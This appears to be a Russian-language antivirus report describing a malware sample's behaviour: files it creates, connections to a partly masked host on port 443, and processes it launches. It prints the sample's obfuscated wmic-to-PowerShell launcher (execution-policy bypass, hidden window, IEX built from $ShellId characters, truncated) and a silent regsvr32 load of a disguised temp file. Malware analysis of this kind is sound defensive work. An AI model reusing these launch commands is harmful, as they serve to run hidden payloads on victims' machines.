Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\wbem\wmic.exe' 'prOCeSS' cALL 'CrEaTe' "POWeRShell -EXECuTi byPASS -NOprO -WiNDo 000001 -NoninTerAc $D89 =([CHAR]34).ToStRiNG() ;$F2S = ([Char]44).TOSTRINg() ; & ( $shEllId[1]+$sHElLId[13]+'X')( "\"...
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\12af0000
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\dd_ndp452-kb2901907-x86-x64-allos-enu_decompression_log
Сетевая активность
TCP
- 'ro###orc.com':443
- '17#.#28.83.136':443
UDP
- DNS ASK ro###orc.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wbem\wmic.exe' 'prOCeSS' cALL 'CrEaTe' "POWeRShell -EXECuTi byPASS -NOprO -WiNDo 000001 -NoninTerAc $D89 =([CHAR]34).ToStRiNG() ;$F2S = ([Char]44).TOSTRINg() ; & ( $shEllId[1]+$sHElLId[13]+'X')( "\"...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\regsvr32.exe' -s %TEMP%\dd_NDP452-KB2901907-x86-x64-AllOS-ENU_decompression_log.
